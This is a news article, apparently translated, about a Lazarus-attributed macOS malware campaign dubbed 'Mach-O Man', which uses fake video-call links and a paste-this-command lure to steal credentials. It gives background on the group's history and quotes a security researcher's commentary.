North Korean hackers target Apple users with fake video calls: how the “Mach-O Man” malware deception works

The information comes from an investigation carried out by a hacker and cybercriminal intelligence specialist, Mauro Eldritch, who published an article that details how this threat operates: the attack starts with a false invitation to a video call and continues with a alleged technical error which forces the victim to copy and paste a command and ends with the theft of credentials, active browser sessions and password data from Apple.

North Korea’s presence in the corporate cybercrime world is growing. In 2023, the hacker discovered an active campaign of a malicious program posing as a QR code generator to trick users and try to extract information. Over the past year, a campaign of fake interviews by North Korean agents continued They were looking to infiltrate a Mexican fintech.

The analyst named the malware “Mach-O Man”in a play on words with the name of the binary structure in macOS (Mach-O) and the historic song by the Village People.

The infection begins, according to the analysis published on the ANY.RUN platform, with social engineering: deception of the employee. According to the investigation, Telegram is one of the favorite applications to establish contact with the victim (which is why companies ask employees not to use communication applications that are not official ones, like Slack or Teams).

Many times they use accounts stolen from personalities in the crypto world as investors and take advantage of those contact lists to search for victims. This step is key and is what explains why the victim “knows” the sender of these messages: believe it is a legitimate exchange.

The link redirects to a fake page that imitates Zoom, Google Meet, or even Microsoft Teams. Once there, an alleged technical error appears and the victim receives an instruction to “fix” the problem: copy and paste a command into the Mac Terminal, which is an internal system interface that allows commands to be executed in text. That is the key to the attack: the user himself executes an order that opens the door to the attackerinstead of exploiting a system vulnerability.

From then on, the malware downloads a fake application that can impersonate Zoom, Teams, or even a system message. That window asks the user to enter their Mac password several times. Meanwhile, in the background, the program begins to collect information from the computer, installs mechanisms to remain active even if the computer restarts and looks for saved browser credentials, cookies, and open sessions.

According to Eldritch’s analysis, all that information is compressed and sent to attackers via Telegram. From then on, the uses of this stolen information can be multiple, but they always tend to have malicious purposes.

This operation, which is not new, was characterized by being detected targeting companies in Latin America.

Lazarus is the name by which one of the most famous and persistent hacker groups in the world is known, linked for years to the North Korean regime. The first traces of its activity appear between the late 2000s and early 2010s, when researchers began to link it with espionage and sabotage campaigns against South Korea.

Over time, it went from being seen as a cyberespionage actor to becoming a hybrid machine that combines political operations, information theft, destructive attacks and financial coups on a global scale.

Strictly speaking, although we speak of “North Korean hackers”, in technical terminology it is said that their actions are “attributed to North Korea”in addition to talking about “degrees of confidence” in the attribution. In the case of Mach-O Man, the degree of confidence that Lazarus is behind it is high.

“When analyzing the Mach-O Man campaign alongside previous Check Point investigations such as The Whitelist Illusion, a clear pattern emerges in the way Lazarus operates: leveraging trust as an entry point,” he says in conversation with Clarion Alejandro Botter, Check Point engineering manager for southern Latin America.

“Whether through fake virtual meetings that lead people to take actions that seem normal, or through the use of relationships previously considered safe in crypto environments, the group avoids direct attacks and instead relies on legitimate processes to go unnoticed,” he adds.

“From Check Point’s perspective, it is relevant how this activity aligns with patterns and trends we have observed over time at Lazarus. Previous research shows that this actor prioritizes highly directed operations, focused on high-value profiles and environments, and adapted to the technological and operational contexts of its objectives,” he continues.

“In that sense, the use of credible decoys, targeting specific users and the preference for low-noise initial access mechanisms reinforce a consistent strategy of the group, regardless of the malware or specific campaign involved,” he closes.

Among the best-known Lazarus attacks is the hack of Sony Pictures in 2014, which exposed unreleased films, internal emails and employee data; the theft of US$81 million from the Central Bank of Bangladesh in 2016 through the SWIFT system and ransomware WannaCry and 2017the most popular in the world: it infected hundreds of thousands of computers in more than 150 countries.

In recent years, furthermore, Lazarus was once again at the center of the scene for its focus on the crypto ecosystem: In 2022, the FBI identified him as responsible for the theft of some US$620 million from the Ronin network, linked to the Axie Infinity game.